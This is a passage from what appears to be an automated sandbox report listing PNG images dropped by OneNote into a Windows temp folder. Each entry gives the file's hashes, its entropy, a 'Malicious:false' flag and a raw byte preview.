                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{CF1C65F0-78A5-447E-A339-0F2C4E2D7B13}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{D2F29B87-C46C-47A9-83E3-318E42C89CA2}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{D382E7B1-9901-4670-B5DF-2D9517364971}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{D49E866F-8210-4FAB-99BB-1DF799FEEC4D}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{DBD973C2-4765-4AF4-8165-5F5CE4013392}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{DCB8EBEE-0168-45FB-AC96-FD4069482101}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{DF5928D0-876D-4DB9-BD48-6C6FA240043A}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{E19443DA-0221-44B1-8C09-00D7B3EC5327}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{E1E81520-E2E1-42D4-AC92-987455638AD1}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{E243B879-7560-48A0-8CFA-C0C61A2E7F0B}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{E39DC982-ACEA-48EF-ABE1-EA6F67681ED5}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{E570365B-6B4A-45A6-BAD7-C84F59D2A691}
